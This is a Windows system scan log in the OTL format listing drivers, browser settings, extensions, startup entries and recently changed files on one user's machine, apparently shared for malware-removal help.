DRV:64bit: - [2009/06/11 07:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 12:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKU\S-1-5-21-2275511576-419542734-2349628481-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.17.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@abr.gov.au/KeyMgmtPlugin: C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]\ [2014/09/30 17:07:04 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
[2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/04/19 13:26:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: SEOquake = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc\1.0.21_0\
CHR - Extension: Google Docs = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Reddit Enhancement Suite = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.3.2.1_0\
CHR - Extension: Google Wallet = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Gmail = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2009/06/11 08:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (iSkysoft Video Converter Ultimate 5.1.0) - {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} - C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2275511576-419542734-2349628481-1000..\Run: [Spotify Web Helper] C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O4 - HKU\.DEFAULT..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
O4 - HKU\S-1-5-18..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{50EF78CE-304E-4B7A-9AAB-DDBCC5200660}: DhcpNameServer = 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{910DEC28-ADB7-41E8-A772-D1D261B4EC8C}: DhcpNameServer = 192.168.1.1 192.168.1.1
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell\AutoRun\command - "" = H:\autorun.exe
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell\AutoRun\command - "" = F:\HTC_Sync_Manager_PC.exe
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell\AutoRun\command - "" = F:\Startme.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/10/22 14:15:31 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/10/21 01:27:42 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
[2014/10/16 14:16:26 | 000,000,000 | ---D | C] -- C:\zoek_backup
[2014/10/15 15:39:16 | 000,000,000 | ---D | C] -- C:\FRST
[2014/10/15 13:08:47 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscorier.dll
[2014/10/15 13:08:47 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscorier.dll
[2014/10/15 13:08:46 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dfshim.dll
[2014/10/15 13:08:46 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dfshim.dll
[2014/10/15 13:08:46 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscories.dll
[2014/10/15 13:08:45 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscories.dll
[2014/10/15 13:08:43 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/15 13:08:43 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/15 13:08:41 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/15 13:08:39 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/10/15 13:08:39 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/10/15 13:08:39 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/10/15 13:08:39 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/10/15 13:08:38 | 000,710,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/10/15 13:08:38 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/10/15 13:08:38 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/10/15 13:08:37 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/10/15 13:08:37 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/10/15 13:08:34 | 002,017,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/10/15 13:08:34 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/10/15 13:08:33 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/10/15 13:08:32 | 000,731,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/10/15 13:08:32 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/10/15 13:08:32 | 000,440,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/10/15 13:08:32 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/10/15 13:08:31 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/10/15 13:08:30 | 002,108,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/10/15 13:08:29 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/10/15 13:08:29 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/10/15 13:08:28 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/10/15 13:08:27 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/10/15 13:08:27 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/10/15 13:08:24 | 000,595,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/10/15 13:08:24 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/10/15 13:08:23 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/10/15 13:08:22 | 005,829,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/10/15 13:08:22 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/10/15 13:08:22 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/10/15 13:08:22 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/10/15 13:08:21 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/10/15 13:08:21 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/10/15 13:08:20 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/10/15 13:08:19 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/10/15 13:08:18 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/10/15 13:07:57 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll
[2014/10/15 13:07:50 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rastls.dll
[2014/10/15 13:07:49 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rastls.dll
[2014/10/15 13:07:44 | 003,221,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstscax.dll
[2014/10/15 13:07:43 | 003,722,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstscax.dll
[2014/10/15 13:07:42 | 001,118,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstsc.exe
[2014/10/15 13:07:41 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstsc.exe
[2014/10/15 13:07:40 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsta.dll
[2014/10/15 13:07:40 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorekmts.dll
[2014/10/15 13:07:39 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/10/15 13:07:39 | 000,131,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\aaclient.dll
[2014/10/15 13:07:20 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\packager.dll
[2014/10/15 13:07:19 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\packager.dll
[2014/10/01 14:52:30 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/10/01 14:51:50 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
[2014/10/01 14:51:45 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\WinZip
[2014/10/01 14:51:08 | 000,000,000 | ---D | C] -- C:\ProgramData\WinZip
[2014/10/01 14:50:58 | 000,000,000 | ---D | C] -- C:\Program Files\WinZip
[2014/10/01 09:33:40 | 000,371,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2014/10/01 09:33:39 | 000,519,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2014/09/30 17:15:15 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Desktop\Mitey Shield video
[2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
[2014/09/30 17:07:40 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
[2014/09/30 17:07:24 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
[2014/09/30 17:07:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\iSkysoft
[2014/09/30 17:07:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
[2014/09/30 17:06:27 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft Video Converter Ultimate
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iSkysoft
[2014/09/30 17:05:20 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\iSkysoft
[2014/09/22 18:48:09 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\vlc
[2014/09/22 18:46:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VLC
 
========== Files - Modified Within 30 Days ==========
 
[2014/10/22 14:19:36 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/10/22 14:19:35 | 000,002,193 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/10/22 14:14:42 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/10/22 14:14:42 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/10/22 14:14:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/10/22 14:11:36 | 003,228,880 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/10/22 14:11:36 | 001,426,584 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/10/22 14:11:36 | 000,006,206 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/10/22 14:09:03 | 000,000,598 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
[2014/10/22 14:07:02 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/10/22 14:06:55 | 3056,103,424 | -HS- | M] () -- C:\hiberfil.sys
[2014/10/22 13:28:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/10/22 13:22:45 | 000,004,096 | -H-- | M] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/10/18 10:29:48 | 000,356,632 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/10/16 13:45:22 | 000,002,289 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/10/16 13:45:22 | 000,001,447 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/10/10 13:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/10 13:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/10 13:00:38 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/02 17:52:02 | 000,002,547 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
[2014/09/30 17:12:05 | 000,076,441 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/30 17:07:06 | 000,001,354 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/29 21:19:55 | 433,221,317 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014/09/26 13:08:59 | 000,000,004 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/09/26 09:46:19 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/09/26 09:32:04 | 002,017,280 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/09/26 09:31:02 | 002,108,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/09/25 13:08:38 | 000,371,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2014/09/25 12:40:50 | 000,519,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2014/09/24 20:48:05 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/09/24 20:48:05 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
 
========== Files Created - No Company Name ==========
 
